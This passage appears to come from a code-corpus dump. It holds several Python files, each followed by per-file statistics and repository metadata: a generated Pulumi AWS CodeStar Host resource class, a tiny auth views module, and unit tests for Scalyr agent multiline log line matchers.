:param pulumi.Input[str] name: The name of the host to be created. The name must be unique in the calling AWS account.
:param pulumi.Input[str] provider_endpoint: The endpoint of the infrastructure to be represented by the host after it is created.
:param pulumi.Input[str] provider_type: The name of the external provider where your third-party code repository is configured.
:param pulumi.Input[pulumi.InputType['HostVpcConfigurationArgs']] vpc_configuration: The VPC configuration to be provisioned for the host. A VPC must be configured, and the infrastructure to be represented by the host must already be connected to the VPC.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: HostArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a CodeStar Host.
> **NOTE:** The `codestarconnections.Host` resource is created in the state `PENDING`. Authentication with the host provider must be completed in the AWS Console. For more information visit [Set up a pending host](https://docs.aws.amazon.com/dtconsole/latest/userguide/connections-host-setup.html).
## Example Usage
```python
import pulumi
import pulumi_aws as aws
example = aws.codestarconnections.Host("example",
provider_endpoint="https://example.com",
provider_type="GitHubEnterpriseServer")
```
## Import
CodeStar Host can be imported using the ARN, e.g.
```sh
$ pulumi import aws:codestarconnections/host:Host example-host arn:aws:codestar-connections:us-west-1:0123456789:host/79d4d357-a2ee-41e4-b350-2fe39ae59448
```
:param str resource_name: The name of the resource.
:param HostArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(HostArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
name: Optional[pulumi.Input[str]] = None,
provider_endpoint: Optional[pulumi.Input[str]] = None,
provider_type: Optional[pulumi.Input[str]] = None,
vpc_configuration: Optional[pulumi.Input[pulumi.InputType['HostVpcConfigurationArgs']]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = HostArgs.__new__(HostArgs)
__props__.__dict__["name"] = name
if provider_endpoint is None and not opts.urn:
raise TypeError("Missing required property 'provider_endpoint'")
__props__.__dict__["provider_endpoint"] = provider_endpoint
if provider_type is None and not opts.urn:
raise TypeError("Missing required property 'provider_type'")
__props__.__dict__["provider_type"] = provider_type
__props__.__dict__["vpc_configuration"] = vpc_configuration
__props__.__dict__["arn"] = None
__props__.__dict__["status"] = None
super(Host, __self__).__init__(
'aws:codestarconnections/host:Host',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
arn: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
provider_endpoint: Optional[pulumi.Input[str]] = None,
provider_type: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
vpc_configuration: Optional[pulumi.Input[pulumi.InputType['HostVpcConfigurationArgs']]] = None) -> 'Host':
"""
Get an existing Host resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] arn: The CodeStar Host ARN.
:param pulumi.Input[str] name: The name of the host to be created. The name must be unique in the calling AWS account.
:param pulumi.Input[str] provider_endpoint: The endpoint of the infrastructure to be represented by the host after it is created.
:param pulumi.Input[str] provider_type: The name of the external provider where your third-party code repository is configured.
:param pulumi.Input[str] status: The CodeStar Host status. Possible values are `PENDING`, `AVAILABLE`, `VPC_CONFIG_DELETING`, `VPC_CONFIG_INITIALIZING`, and `VPC_CONFIG_FAILED_INITIALIZATION`.
:param pulumi.Input[pulumi.InputType['HostVpcConfigurationArgs']] vpc_configuration: The VPC configuration to be provisioned for the host. A VPC must be configured, and the infrastructure to be represented by the host must already be connected to the VPC.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _HostState.__new__(_HostState)
__props__.__dict__["arn"] = arn
__props__.__dict__["name"] = name
__props__.__dict__["provider_endpoint"] = provider_endpoint
__props__.__dict__["provider_type"] = provider_type
__props__.__dict__["status"] = status
__props__.__dict__["vpc_configuration"] = vpc_configuration
return Host(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def arn(self) -> pulumi.Output[str]:
"""
The CodeStar Host ARN.
"""
return pulumi.get(self, "arn")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the host to be created. The name must be unique in the calling AWS account.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="providerEndpoint")
def provider_endpoint(self) -> pulumi.Output[str]:
"""
The endpoint of the infrastructure to be represented by the host after it is created.
"""
return pulumi.get(self, "provider_endpoint")
@property
@pulumi.getter(name="providerType")
def provider_type(self) -> pulumi.Output[str]:
"""
The name of the external provider where your third-party code repository is configured.
"""
return pulumi.get(self, "provider_type")
@property
@pulumi.getter
def status(self) -> pulumi.Output[str]:
"""
The CodeStar Host status. Possible values are `PENDING`, `AVAILABLE`, `VPC_CONFIG_DELETING`, `VPC_CONFIG_INITIALIZING`, and `VPC_CONFIG_FAILED_INITIALIZATION`.
"""
return pulumi.get(self, "status")
@property
@pulumi.getter(name="vpcConfiguration")
def vpc_configuration(self) -> pulumi.Output[Optional['outputs.HostVpcConfiguration']]:
"""
The VPC configuration to be provisioned for the host. A VPC must be configured, and the infrastructure to be represented by the host must already be connected to the VPC.
"""
return pulumi.get(self, "vpc_configuration")
| 46.043478
| 306
| 0.663889
| 2,156
| 18,003
| 5.352968
| 0.09462
| 0.064812
| 0.064293
| 0.055281
| 0.852006
| 0.835803
| 0.805043
| 0.789013
| 0.756694
| 0.739537
| 0
| 0.004756
| 0.240793
| 18,003
| 390
| 307
| 46.161538
| 0.839625
| 0.396156
| 0
| 0.620853
| 1
| 0
| 0.118956
| 0.027901
| 0
| 0
| 0
| 0
| 0
| 1
| 0.156398
| false
| 0.004739
| 0.033175
| 0
| 0.28436
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
68571c2636ced4e851e074b23a5a2e8c9762dbe0
| 37
|
py
|
Python
|
app/auth/views.py
|
derriqo/Housemngr
|
a58a3cb26c1149235eba1e641e7974b9091bc86b
|
[
"MIT"
] | 1
|
2019-12-13T12:20:40.000Z
|
2019-12-13T12:20:40.000Z
|
app/auth/views.py
|
derriqo/Housemngr
|
a58a3cb26c1149235eba1e641e7974b9091bc86b
|
[
"MIT"
] | 6
|
2021-02-08T20:34:04.000Z
|
2022-03-11T23:56:28.000Z
|
app/auth/views.py
|
derriqo/Housemngr
|
a58a3cb26c1149235eba1e641e7974b9091bc86b
|
[
"MIT"
] | 6
|
2019-02-19T09:03:28.000Z
|
2019-02-21T06:38:35.000Z
|
from . import auth
from .. import db
| 12.333333
| 18
| 0.702703
| 6
| 37
| 4.333333
| 0.666667
| 0.769231
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.216216
| 37
| 2
| 19
| 18.5
| 0.896552
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
68a428800dfe0506cd4ace79a036d879b347b3a3
| 29,910
|
py
|
Python
|
scalyr_agent/tests/line_matcher_test.py
|
echee2/scalyr-agent-2
|
da7d168260b94dc95aedb5ae0dca03165e55cb02
|
[
"Apache-2.0"
] | null | null | null |
scalyr_agent/tests/line_matcher_test.py
|
echee2/scalyr-agent-2
|
da7d168260b94dc95aedb5ae0dca03165e55cb02
|
[
"Apache-2.0"
] | null | null | null |
scalyr_agent/tests/line_matcher_test.py
|
echee2/scalyr-agent-2
|
da7d168260b94dc95aedb5ae0dca03165e55cb02
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2015 Scalyr Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------
#
# author: Imron Alston <imron@scalyr.com>
__author__ = 'imron@scalyr.com'
import time
import unittest
import pdb
from cStringIO import StringIO
from scalyr_agent.line_matcher import LineMatcher
from scalyr_agent.line_matcher import LineMatcherCollection
from scalyr_agent.line_matcher import ContinueThrough
from scalyr_agent.line_matcher import ContinuePast
from scalyr_agent.line_matcher import HaltBefore
from scalyr_agent.line_matcher import HaltWith
def make_string( string ):
line = StringIO()
line.write( string )
line.seek( 0 )
return line
def append_string( line, string ):
offset = line.tell()
line.seek( 0, 2 )
line.write( string )
line.seek( offset )
return line
class SingleLineMatcherTestCase( unittest.TestCase ):
def test_single_line( self ):
expected = "Hello World\n"
line = make_string( expected )
line_matcher = LineMatcher()
actual = line_matcher.readline( line, time.time() )
self.assertEqual( expected, actual )
def test_single_line_partial( self ):
expected = "Hello World"
line = make_string( expected )
line_matcher = LineMatcher()
actual = line_matcher.readline( line, time.time() )
self.assertEqual( '', actual )
line = append_string( line, "\n" )
actual = line_matcher.readline( line, time.time() )
self.assertEqual( expected + "\n", actual )
def test_single_line_partial_timeout( self ):
expected = "Hello World"
line = make_string( expected )
line_matcher = LineMatcher( line_completion_wait_time = 5 )
current_time = time.time() - 6
actual = line_matcher.readline( line, current_time )
self.assertEqual( '', actual )
actual = line_matcher.readline( line, time.time() )
self.assertEqual( expected, actual )
def test_single_line_partial_too_long( self ):
expected = "Hello World"
line = make_string( expected + " How are you today" )
line_matcher = LineMatcher( max_line_length=11 )
current_time = time.time()
actual = line_matcher.readline( line, current_time )
self.assertEqual( expected, actual )
class ContinueThroughTestCase( unittest.TestCase ):
def setUp( self ):
self.start_pattern = "^[^\\s]"
self.continuation_pattern = "^[\\s]+at"
def test_continue_through( self ):
expected = "java.lang.Exception\n at com.foo.bar(bar.java:123)\n at com.foo.baz(baz.java:123)\n"
expected_next = "next line\n"
line = make_string( expected + expected_next )
matcher = ContinueThrough( self.start_pattern, self.continuation_pattern )
current_time = time.time()
actual = matcher.readline( line, current_time )
self.assertEqual( expected, actual )
actual = matcher.readline( line, current_time )
self.assertEqual( '', actual )
actual = line.readline()
self.assertEqual( expected_next, actual )
def test_first_line_match_second_line_no_match( self ):
expected = "java.lang.Exception\n"
expected_next = "haha Not a java.lang.Exception\n"
line = make_string( expected + expected_next )
matcher = ContinueThrough( self.start_pattern, self.continuation_pattern )
current_time = time.time()
actual = matcher.readline( line, current_time )
self.assertEqual( '', actual )
actual = line.readline()
self.assertEqual( expected, actual )
def test_partial_first_line_match( self ):
expected = "java.lang.Exception\n"
expected_next = " at com.foo.bar(bar.java:123)\n"
expected_last = "Another line\n"
line = make_string( expected )
matcher = ContinueThrough( self.start_pattern, self.continuation_pattern )
current_time = time.time()
actual = matcher.readline( line, current_time )
self.assertEqual( '', actual )
line = append_string( line, expected_next + expected_last )
actual = matcher.readline( line, current_time )
self.assertEqual( expected + expected_next, actual )
actual = line.readline()
self.assertEqual( expected_last, actual )
def test_partial_multiline_match( self ):
expected = "java.lang.Exception\n at com.foo.bar(bar.java:123)\n at com.foo.baz(baz.java:456)\n"
expected_last = "Another line\n"
line = make_string( expected )
matcher = ContinueThrough( self.start_pattern, self.continuation_pattern )
current_time = time.time()
actual = matcher.readline( line, current_time )
self.assertEqual( '', actual )
line = append_string( line, expected_last )
actual = matcher.readline( line, current_time )
self.assertEqual( expected, actual )
actual = line.readline()
self.assertEqual( expected_last, actual )
def test_no_match( self ):
line1 = " starts with a space\n"
line2 = " also starts with a space\n"
line = make_string( line1 + line2 )
matcher = ContinueThrough( self.start_pattern, self.continuation_pattern )
current_time = time.time()
actual = matcher.readline( line, current_time )
self.assertEqual( '', actual )
actual = matcher.readline( line, current_time )
self.assertEqual( '', actual )
actual = line.readline()
self.assertEqual( line1, actual )
def test_timeout_after_matching_start( self ):
expected = "java.lang.Exception\n"
line = make_string( expected )
matcher = ContinueThrough( self.start_pattern, self.continuation_pattern, line_completion_wait_time = 5 )
current_time = time.time()
actual = matcher.readline( line, current_time - 6 )
self.assertEqual( '', actual )
actual = matcher.readline( line, current_time )
self.assertEqual( expected, actual )
expected_next = " starts with a space\n"
line = append_string( line, expected_next )
actual = matcher.readline( line, current_time )
self.assertEqual( '', actual )
actual = line.readline()
self.assertEqual( expected_next, actual )
def test_timeout_after_matching_continue( self ):
expected = "java.lang.Exception\n at com.foo.bar(bar.java:123)\n"
line = make_string( expected )
matcher = ContinueThrough( self.start_pattern, self.continuation_pattern, line_completion_wait_time = 5 )
current_time = time.time()
actual = matcher.readline( line, current_time - 6 )
self.assertEqual( '', actual )
actual = matcher.readline( line, current_time )
self.assertEqual( expected, actual )
expected_next = " starts with a space\n"
line = append_string( line, expected_next )
actual = matcher.readline( line, current_time )
self.assertEqual( '', actual )
actual = line.readline()
self.assertEqual( expected_next, actual )
def test_too_long_matching_start( self ):
expected = "java.lang."
line = make_string( expected + "Exception\n" )
matcher = ContinueThrough( self.start_pattern, self.continuation_pattern, max_line_length = 10 )
current_time = time.time()
actual = matcher.readline( line, current_time )
self.assertEqual( expected, actual )
actual = line.readline()
self.assertEqual( "Exception\n", actual )
def test_too_long_after_matching_continue( self ):
expected = "java.lang.Exception\n at com"
remainder = ".foo.baz(baz.java:123)\n"
line = make_string( expected + remainder )
matcher = ContinueThrough( self.start_pattern, self.continuation_pattern, max_line_length = 30 )
current_time = time.time()
actual = matcher.readline( line, current_time )
self.assertEqual( expected, actual )
actual = line.readline()
self.assertEqual( remainder, actual )
class ContinuePastTestCase( unittest.TestCase ):
def setUp( self ):
self.start_pattern = r"\\$"
self.continuation_pattern = r"\\$"
def test_continue_past( self ):
expected = "This is a multiline \\\nstring with each line\\\nseparated by backslashes\n"
expected_next = "next line\n"
line = make_string( expected + expected_next )
matcher = ContinuePast( self.start_pattern, self.continuation_pattern )
current_time = time.time()
actual = matcher.readline( line, current_time )
self.assertEqual( expected, actual )
actual = matcher.readline( line, current_time )
self.assertEqual( '', actual )
actual = line.readline()
self.assertEqual( expected_next, actual )
def test_first_line_match_second_line_no_match( self ):
expected = "multiline string \\\nthat ends here\n"
expected_next = "single line string\n"
line = make_string( expected + expected_next )
matcher = ContinuePast( self.start_pattern, self.continuation_pattern )
current_time = time.time()
actual = matcher.readline( line, current_time )
self.assertEqual( expected, actual )
actual = matcher.readline( line, current_time )
self.assertEqual( '', actual )
actual = line.readline()
self.assertEqual( expected_next, actual )
def test_partial_first_line_match( self ):
expected = "start of a multiline\\\n"
expected_next = "last line\n"
expected_last = "Another line\n"
line = make_string( expected )
matcher = ContinuePast( self.start_pattern, self.continuation_pattern )
current_time = time.time()
actual = matcher.readline( line, current_time )
self.assertEqual( '', actual )
line = append_string( line, expected_next + expected_last )
actual = matcher.readline( line, current_time )
self.assertEqual( expected + expected_next, actual )
actual = line.readline()
self.assertEqual( expected_last, actual )
def test_partial_multiline_match( self ):
expected = "start of a multiline line\\\ncontinuation of a multiline line\\\nstill continuing\\\n"
expected_last = "Another line\n"
line = make_string( expected )
matcher = ContinuePast( self.start_pattern, self.continuation_pattern )
current_time = time.time()
actual = matcher.readline( line, current_time )
self.assertEqual( '', actual )
line = append_string( line, expected_last )
actual = matcher.readline( line, current_time )
self.assertEqual( expected + expected_last, actual )
actual = line.readline()
self.assertEqual( '', actual )
def test_no_match( self ):
line1 = "single line\n"
line2 = "another single line\n"
line = make_string( line1 + line2 )
matcher = ContinuePast( self.start_pattern, self.continuation_pattern )
current_time = time.time()
actual = matcher.readline( line, current_time )
self.assertEqual( '', actual )
actual = matcher.readline( line, current_time )
self.assertEqual( '', actual )
actual = line.readline()
self.assertEqual( line1, actual )
def test_timeout_after_matching_start( self ):
expected = "start of a multiline\\\n"
line = make_string( expected )
matcher = ContinuePast( self.start_pattern, self.continuation_pattern, line_completion_wait_time = 5 )
current_time = time.time()
actual = matcher.readline( line, current_time - 6 )
self.assertEqual( '', actual )
actual = matcher.readline( line, current_time )
self.assertEqual( expected, actual )
actual = line.readline()
self.assertEqual( '', actual )
def test_timeout_after_matching_continue( self ):
expected = "start of a multiline\\\ncontinuation of a multiline\\\n"
line = make_string( expected )
matcher = ContinuePast( self.start_pattern, self.continuation_pattern, line_completion_wait_time = 5 )
current_time = time.time()
actual = matcher.readline( line, current_time - 6 )
self.assertEqual( '', actual )
actual = matcher.readline( line, current_time )
self.assertEqual( expected, actual )
actual = line.readline()
self.assertEqual( '', actual )
def test_too_long_matching_start( self ):
expected = "start of a"
line = make_string( expected + " multiline\\\n" )
matcher = ContinuePast( self.start_pattern, self.continuation_pattern, max_line_length = 10 )
current_time = time.time()
actual = matcher.readline( line, current_time )
self.assertEqual( expected, actual )
actual = line.readline()
self.assertEqual( " multiline\\\n", actual )
def test_too_long_after_matching_continue( self ):
expected = "start of a multiline\\\ncontinuing\\\nthis line "
remainder = "will be cut\n"
line = make_string( expected + remainder )
matcher = ContinuePast( self.start_pattern, self.continuation_pattern, max_line_length = 44 )
current_time = time.time()
actual = matcher.readline( line, current_time )
self.assertEqual( expected, actual )
actual = line.readline()
self.assertEqual( remainder, actual )
class HaltBeforeTestCase( unittest.TestCase ):
def setUp( self ):
self.start_pattern = r"^--begin"
self.continuation_pattern = r"^--begin"
def test_halt_before( self ):
expected = "--begin\nThis is a multiline message\nThat will end when the\nnext one starts\n"
expected_next = "--begin\n"
line = make_string( expected + expected_next )
matcher = HaltBefore( self.start_pattern, self.continuation_pattern )
current_time = time.time()
actual = matcher.readline( line, current_time )
self.assertEqual( expected, actual )
actual = matcher.readline( line, current_time )
self.assertEqual( '', actual )
actual = line.readline()
self.assertEqual( expected_next, actual )
def test_first_line_match_second_line_no_match( self ):
expected = "--begin\n"
expected_next = "--begin\n"
line = make_string( expected + expected_next )
matcher = HaltBefore( self.start_pattern, self.continuation_pattern )
current_time = time.time()
actual = matcher.readline( line, current_time )
self.assertEqual( expected, actual )
actual = matcher.readline( line, current_time )
self.assertEqual( '', actual )
def test_partial_first_line_match( self ):
expected = "--begin\n"
expected_next = "last line\n"
expected_last = "--begin\n"
line = make_string( expected )
matcher = HaltBefore( self.start_pattern, self.continuation_pattern )
current_time = time.time()
actual = matcher.readline( line, current_time )
self.assertEqual( '', actual )
line = append_string( line, expected_next + expected_last )
actual = matcher.readline( line, current_time )
self.assertEqual( expected + expected_next, actual )
actual = line.readline()
self.assertEqual( expected_last, actual )
def test_partial_multiline_match( self ):
expected = "--begin\ncontinuation of a multiline line\nstill continuing\n"
expected_last = "--begin\n"
line = make_string( expected )
matcher = HaltBefore( self.start_pattern, self.continuation_pattern )
current_time = time.time()
actual = matcher.readline( line, current_time )
self.assertEqual( '', actual )
line = append_string( line, expected_last )
actual = matcher.readline( line, current_time )
self.assertEqual( expected, actual )
actual = line.readline()
self.assertEqual( expected_last, actual )
def test_no_match( self ):
line1 = "single line\n"
line2 = "another single line\n"
line = make_string( line1 + line2 )
matcher = HaltBefore( self.start_pattern, self.continuation_pattern )
current_time = time.time()
actual = matcher.readline( line, current_time )
self.assertEqual( '', actual )
actual = matcher.readline( line, current_time )
self.assertEqual( '', actual )
actual = line.readline()
self.assertEqual( line1, actual )
def test_timeout_after_matching_start( self ):
expected = "--begin\n"
line = make_string( expected )
matcher = HaltBefore( self.start_pattern, self.continuation_pattern, line_completion_wait_time = 5 )
current_time = time.time()
actual = matcher.readline( line, current_time - 6 )
self.assertEqual( '', actual )
actual = matcher.readline( line, current_time )
self.assertEqual( expected, actual )
actual = line.readline()
self.assertEqual( '', actual )
def test_timeout_after_matching_continue( self ):
expected = "--begin\nMultiline\n"
line = make_string( expected )
matcher = HaltBefore( self.start_pattern, self.continuation_pattern, line_completion_wait_time = 5 )
current_time = time.time()
actual = matcher.readline( line, current_time - 6 )
self.assertEqual( '', actual )
actual = matcher.readline( line, current_time )
self.assertEqual( expected, actual )
actual = line.readline()
self.assertEqual( '', actual )
def test_too_long_matching_start( self ):
expected = "--begin"
line = make_string( expected + " multiline\n" )
matcher = HaltBefore( self.start_pattern, self.continuation_pattern, max_line_length = 7 )
current_time = time.time()
actual = matcher.readline( line, current_time )
self.assertEqual( expected, actual )
actual = line.readline()
self.assertEqual( " multiline\n", actual )
def test_too_long_after_matching_continue( self ):
expected = "--begin\nmultiline\nthis line "
remainder = "will be cut\n"
line = make_string( expected + remainder )
matcher = HaltBefore( self.start_pattern, self.continuation_pattern, max_line_length = 28 )
current_time = time.time()
actual = matcher.readline( line, current_time )
self.assertEqual( expected, actual )
actual = line.readline()
self.assertEqual( remainder, actual )
def test_too_long_after_matching_partial_halt( self ):
expected = "--begin\nmultiline\nmulti\n--beginthis line "
remainder = "will be cut\n"
line = make_string( expected + remainder )
matcher = HaltBefore( self.start_pattern, self.continuation_pattern, max_line_length = 41 )
current_time = time.time()
actual = matcher.readline( line, current_time )
self.assertEqual( expected, actual )
actual = line.readline()
self.assertEqual( remainder, actual )
class HaltWithTestCase( unittest.TestCase ):
def setUp( self ):
self.start_pattern = r"^--begin"
self.continuation_pattern = r"^--end"
def test_halt_before( self ):
expected = "--begin\nThis is a multiline message\nThat will end when the\nnext one starts\n--end\n"
expected_next = "next line\n"
line = make_string( expected + expected_next )
matcher = HaltWith( self.start_pattern, self.continuation_pattern )
current_time = time.time()
actual = matcher.readline( line, current_time )
self.assertEqual( expected, actual )
actual = matcher.readline( line, current_time )
self.assertEqual( '', actual )
actual = line.readline()
self.assertEqual( expected_next, actual )
def test_first_line_match_second_line_no_match( self ):
expected = "--begin\n"
expected_next = "--end\n"
line = make_string( expected + expected_next )
matcher = HaltWith( self.start_pattern, self.continuation_pattern )
current_time = time.time()
actual = matcher.readline( line, current_time )
self.assertEqual( expected + expected_next, actual )
actual = matcher.readline( line, current_time )
self.assertEqual( '', actual )
def test_partial_first_line_match( self ):
expected = "--begin\n"
expected_next = "--end\n"
expected_last = "next line\n"
line = make_string( expected )
matcher = HaltWith( self.start_pattern, self.continuation_pattern )
current_time = time.time()
actual = matcher.readline( line, current_time )
self.assertEqual( '', actual )
line = append_string( line, expected_next + expected_last )
actual = matcher.readline( line, current_time )
self.assertEqual( expected + expected_next, actual )
actual = line.readline()
self.assertEqual( expected_last, actual )
def test_partial_multiline_match( self ):
expected = "--begin\ncontinuation of a multiline line\nstill continuing\n"
expected_end = "--end\n"
line = make_string( expected )
matcher = HaltWith( self.start_pattern, self.continuation_pattern )
current_time = time.time()
actual = matcher.readline( line, current_time )
self.assertEqual( '', actual )
line = append_string( line, expected_end )
actual = matcher.readline( line, current_time )
self.assertEqual( expected + expected_end, actual )
actual = line.readline()
self.assertEqual( '', actual )
def test_no_match( self ):
line1 = "single line\n"
line2 = "another single line\n"
line = make_string( line1 + line2 )
matcher = HaltWith( self.start_pattern, self.continuation_pattern )
current_time = time.time()
actual = matcher.readline( line, current_time )
self.assertEqual( '', actual )
actual = matcher.readline( line, current_time )
self.assertEqual( '', actual )
actual = line.readline()
self.assertEqual( line1, actual )
def test_timeout_after_matching_start( self ):
expected = "--begin\n"
line = make_string( expected )
matcher = HaltWith( self.start_pattern, self.continuation_pattern, line_completion_wait_time = 5 )
current_time = time.time()
actual = matcher.readline( line, current_time - 6 )
self.assertEqual( '', actual )
actual = matcher.readline( line, current_time )
self.assertEqual( expected, actual )
actual = line.readline()
self.assertEqual( '', actual )
def test_timeout_after_matching_continue( self ):
expected = "--begin\nMultiline\n"
line = make_string( expected )
matcher = HaltWith( self.start_pattern, self.continuation_pattern, line_completion_wait_time = 5 )
current_time = time.time()
actual = matcher.readline( line, current_time - 6 )
self.assertEqual( '', actual )
actual = matcher.readline( line, current_time )
self.assertEqual( expected, actual )
actual = line.readline()
self.assertEqual( '', actual )
def test_too_long_matching_start( self ):
expected = "--begin"
line = make_string( expected + " multiline\n" )
matcher = HaltWith( self.start_pattern, self.continuation_pattern, max_line_length = 7 )
current_time = time.time()
actual = matcher.readline( line, current_time )
self.assertEqual( expected, actual )
actual = line.readline()
self.assertEqual( " multiline\n", actual )
def test_too_long_after_matching_continue( self ):
expected = "--begin\nmultiline\nthis line "
remainder = "will be cut\n"
line = make_string( expected + remainder )
matcher = HaltWith( self.start_pattern, self.continuation_pattern, max_line_length = 28 )
current_time = time.time()
actual = matcher.readline( line, current_time )
self.assertEqual( expected, actual )
actual = line.readline()
self.assertEqual( remainder, actual )
class LineMatcherCollectionTestCase( unittest.TestCase ):
def continue_through( self, start="^--multi", cont="^--", length=1024, timeout=60 ):
return ContinueThrough( start, cont, length, timeout )
def continue_through_string( self ):
return "--multi\n--next\n--last\n"
def continue_past( self, start=r"\\$", cont=r"\\$", length=1024, timeout=60 ):
return ContinuePast( start, cont, length, timeout )
def continue_past_string( self ):
return "continue past \\\nand past\\\nand stop\n"
def halt_before( self, start="^--begin", cont="^--last", length=1024, timeout=60 ):
return HaltBefore( start, cont, length, timeout )
def halt_before_string( self ):
return "--begin\nand halt before\nthe next line starting with the start pattern\n"
def halt_with( self, start="^--start", cont="^--end", length=1024, timeout=60 ):
return HaltWith( start, cont, length, timeout )
def halt_with_string( self ):
return "--start\nand stop after\nthe next line\n--end\n"
def single_string( self ):
return "a single line\n"
def line_matcher_collection( self, length=1024, timeout=60 ):
result = LineMatcherCollection( length, timeout )
result.add_matcher( self.continue_through() )
result.add_matcher( self.continue_past() )
result.add_matcher( self.halt_before() )
result.add_matcher( self.halt_with() )
return result
def test_continue_through( self ):
matcher = self.line_matcher_collection()
expected = self.continue_through_string()
current_time = time.time()
line = make_string( expected + self.single_string() )
actual = matcher.readline( line, current_time )
self.assertEqual( expected, actual )
actual = line.readline()
self.assertEqual( self.single_string(), actual )
def test_continue_past( self ):
matcher = self.line_matcher_collection()
expected = self.continue_past_string()
current_time = time.time()
line = make_string( expected + self.single_string() )
actual = matcher.readline( line, current_time )
self.assertEqual( expected, actual )
actual = line.readline()
self.assertEqual( self.single_string(), actual )
def test_halt_before( self ):
matcher = self.line_matcher_collection()
expected = self.halt_before_string()
current_time = time.time()
line = make_string( expected + "--last\n" )
actual = matcher.readline( line, current_time )
self.assertEqual( expected, actual )
actual = line.readline()
self.assertEqual( "--last\n", actual )
def test_halt_with( self ):
matcher = self.line_matcher_collection()
expected = self.halt_with_string()
current_time = time.time()
line = make_string( expected + self.single_string() )
actual = matcher.readline( line, current_time )
self.assertEqual( expected, actual )
actual = line.readline()
self.assertEqual( self.single_string(), actual )
def test_none( self ):
matcher = self.line_matcher_collection()
expected = self.single_string()
current_time = time.time()
line = make_string( expected )
actual = matcher.readline( line, current_time )
self.assertEqual( expected, actual )
actual = line.readline()
self.assertEqual( '', actual )
def test_all( self ):
matcher = self.line_matcher_collection()
end_marker = "--last\n"
expected = self.single_string() + self.halt_with_string() + self.halt_before_string() + end_marker + self.continue_past_string() + self.continue_through_string() + self.single_string()
current_time = time.time()
line = make_string( expected )
actual = matcher.readline( line, current_time )
self.assertEqual( self.single_string(), actual )
actual = matcher.readline( line, current_time )
self.assertEqual( self.halt_with_string(), actual )
actual = matcher.readline( line, current_time )
self.assertEqual( self.halt_before_string(), actual )
actual = matcher.readline( line, current_time )
self.assertEqual( end_marker, actual )
actual = matcher.readline( line, current_time )
self.assertEqual( self.continue_past_string(), actual )
actual = matcher.readline( line, current_time )
self.assertEqual( self.continue_through_string(), actual )
actual = matcher.readline( line, current_time )
self.assertEqual( self.single_string(), actual )
actual = line.readline()
self.assertEqual( '', actual )
| 35.312869
| 192
| 0.645503
| 3,312
| 29,910
| 5.634058
| 0.061896
| 0.100482
| 0.085531
| 0.111468
| 0.884191
| 0.864041
| 0.841479
| 0.830171
| 0.817203
| 0.782476
| 0
| 0.005274
| 0.252023
| 29,910
| 846
| 193
| 35.35461
| 0.828804
| 0.022033
| 0
| 0.79357
| 0
| 0.006768
| 0.076726
| 0.019258
| 0
| 0
| 0
| 0
| 0.211506
| 1
| 0.106599
| false
| 0
| 0.01692
| 0.015228
| 0.153976
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d7b7b2c495dadd1dece51ea84b905a23f0d499d2
| 127
|
py
|
Python
|
src/gybc/statuses.py
|
tblanarik/gycb
|
9481eadd5f9708a9c8d39cbe012ef8a8ba725ead
|
[
"MIT"
] | null | null | null |
src/gybc/statuses.py
|
tblanarik/gycb
|
9481eadd5f9708a9c8d39cbe012ef8a8ba725ead
|
[
"MIT"
